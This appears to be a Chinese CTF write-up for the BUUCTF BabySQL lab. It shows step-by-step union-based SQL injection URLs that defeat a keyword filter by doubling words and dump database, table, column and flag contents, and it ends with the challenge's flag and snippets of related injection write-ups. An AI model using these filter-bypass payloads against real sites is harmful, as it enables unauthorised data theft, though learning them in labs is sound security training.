首页 > 数据库 >[buuctf]/[极客大挑战 2019]BabySQL 1

[buuctf]/[极客大挑战 2019]BabySQL 1

时间:2024-11-12 12:49:03浏览次数:3  
标签:username buuctf 81 BabySQL -- buuoj 2019 password node5

页面上提示输入会被严格过滤,这里我们就要留意一下,经常被过滤掉的几个词

首先测试闭合方式。

http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1'&password=1

6f60d1211fa641e691494bf118b28787.png

这里单引号出现报错,猜测闭合方式是单引号。

下一步,进步确认闭合方式,正常步骤应该输入username=1' and 1=1 --q &password=1

但是,出现了以下报错。

fe2c93bec3d7464bb8314822a0f7e254.png

 结合出题者提示,猜测前面的“and”可能被过滤掉了。

可以通过双写绕过

http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1' aandnd 1=1 -- q&password=1

26f5c0c6d1154c59a670533ada2c519a.png

进一步确认了闭合方式。

然后进行列数判断,又出现类似报错。or和by也被过滤了。

(被过滤的词:and,or,by,union,select,from,where都可以用双写绕过)

http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1' order by 4 -- q&password=1

6892bff8d56a46468d2a3f285dc11bb4.png

 继续双写绕过

http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1' oorrder bbyy 4 -- q&password=1

695846128bee48e99bfa5989d6e0bad5.png

 把4改成3再试一遍,得有3列

0b0414286e5c4f539d330effd12e92e5.png然后在对显示位进行判断

http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1' uniunionon seselectlect 1,2,3 -- q&password=1

fde62f25571944eb930a346bda769ffd.png

接下来就是逐步的爆库,爆表,爆字段,爆内容。

http://0faac226-7a27-48ce-89b5-5a57876d2c1e.node5.buuoj.cn:81/check.php?username=1' ununionIon seselectLect 1,(selselectect group_concat(schema_name) frfromom infoorrmation_schema.schemata),3 -- q&password=1

518460ab2e84434092045a7915d3ae5e.png

 

http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1' ununionIon seselectLect 1,(selselectect group_concat(table_name) frfromom infoorrmation_schEma.tables whwhereere table_schema='ctf'),3 -- q&password=1

acfad536b74c49fa8a916b50984aabfa.png

 

http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1' ununionIon seselectLect 1,(selselectect group_concat(column_name) frfromom infoorrmation_schEma.columns whwhereere table_schema='ctf' aandnd table_name='Flag' ),3 -- q&password=1

fedff5e8fa854d1eaa067fa2f609a3a4.png

 

http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1' ununionIon seselectLect 1,(selselectect group_concat(flag) frfromom Flag),3 -- q&password=1

8c02267757be470395c51927c4e1e605.png这里出现报错,说不存在geek.Flag。根据上面我们知道存在geek这个库,和Flag这个表。但Flag这个表在ctf库下,并不在geek库下。所以可以将Flag改成ctf.Flag,表示查询数据库ctf下Flag表。

http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1' ununionIon seselectLect 1,(selselectect group_concat(flag) frfromom ctf.Flag),3 -- q&password=1

b70ab22381eb403cb15299878e51c08e.png得flag。

 flag{e92ac9af-d555-45ac-8376-b291c904626b}

这里使用的是联合注入。如果还有其他方式注入,欢迎和我交流~~

如有错误,说辞不恰当的地方,请见谅。欢迎纠错~~

小白一个~~

 

标签:username,buuctf,81,BabySQL,--,buuoj,2019,password,node5
From: https://blog.csdn.net/y14ffhgcg56_/article/details/143609172

相关文章

  • ciscn_2019_n_1
    题目链接:ciscn_2019_n_1。下载附件后,使用IDA打开程序,并进行反编译,定位到main函数,如下。int__fastcallmain(intargc,constchar**argv,constchar**envp){setvbuf(_bss_start,0LL,2,0LL);setvbuf(stdin,0LL,2,0LL);func();return0;}func函数......
  • [极客大挑战 2019]Secret
    首页什么都没有,查看网页源码,发现有一个链接,提示found除去view-source访问,得到以下页面,点击secret直接查阅结束,没回显flag,依旧在卖关子。使用burpsuite抓包获取返回的源码,找到注释中有个文件secr3t.php访问secr3t.php得到代码里说flag在flag.php里,直接访问flag.php,发现......
  • [极客大挑战 2019]LoveSQL
    打开是一个登录界面使用admin'or1#万能密码绕过密码登录再使用admin'orderby3#找回显的列数,结果为3,再使用a'unionselect1,2,3#找回显的列,结果为2,3后面就是常规的union注入流程#找数据库和表名a'unionselect1,database(),group_concat(table_name)frominfor......
  • [强网杯 2019]随便注
    输入1',发现报错,且闭合符号为单引号那么我们可以尝试报错注入,先用orderby确认回显列数。这里回显列数为2用union确认回显位置,1unionselect1,2,发现这些字符被过滤了,尝试了大小写也不行,直接猜吧。这里可以用报错注入,1'and(extractvalue(1,concat(0x7e,database(),0x7e)))......
  • [GXYCTF2019]Ping Ping Ping
    打开页面如下:按提示输入ip127.0.0.1尝试加管道符,查看目录结构,?ip=127.0.0.1|lscat查看flag.php他骂我们,说空格不行。使用其他字符替换空格,?ip=127.0.0.1|cat$IFS$9flag.php又骂我们,说flag字符串不行,我们先看看index.php,直接审计代码看看怎么绕过,?ip=127.0.0.1|cat$IFS$......
  • [SUCTF 2019]EasySQL
    当输入数字时返回array结构,且任意非0数字都是返回1。当输入字符串时无任何回显。那么我们可以猜测sql语句中存在逻辑或符号||,因为任意非0在mysql中相当于true且返回值为1,而字符及字符串会被当作变量处理,或运算时会报错。那么绕过的方法是将mysql的sql_mode参数设置为PIPES_AS_CO......
  • [极客大挑战 2019]EasySQL
    网站首页解题思路正常登录看看情况,输入用户名admin,密码随意,先找闭合,输入用户名admin',得到不一样的报错得知闭合符号为单引号。由于我们不知道用户名,可以尝试用or1绕过输入用户名,即用户名输入admin'or1,登录得到flag{d039ca08-d6de-4b03-b876-c2b86d85fa12}......
  • [GXYCTF2019]BabySQli
    题目链接:[GXYCTF2019]BabySQli。个人认为这道题是脑洞题(当然也跟基础业务知识不够有关)。打开题目后环境如下。只有一个登录框,因此常规操作,先测试一下看看。通过多次输入不同的UserName、password发现,存在admin用户,并且可以遍历UserName。接下来尝试注入,发现似乎只有......
  • [CISCN2019 华北赛区 Day2 Web1]Hack World
    题目链接:[CISCN2019华北赛区Day2Web1]HackWorld。打开环境后如下所示。尝试输入1、2、3、4、...,发现仅存在三种结果。即1时,输出"Hello,glzjinwantsagirlfriend."。2时,输出"Doyouwanttobemygirlfriend?"。其他,输出"ErrorOccuredWhenFetchResult."。......
  • 【buuctf】[WUSTCTF2020]spaceclub
    小白的第七天,日常记录WP。flag奉上:wctf2020{h3re_1s_y0ur_fl@g_s1x_s1x_s1x}1.打开下载的附件发现里面有内容但是被隐藏了。2.使用Sublime_Text打开选中发现了一堆点。3.猜测是二进制数,将长的替换成1,短的替换成0。(先替换长的不然会将短的部分变为1)4.使用python脚本......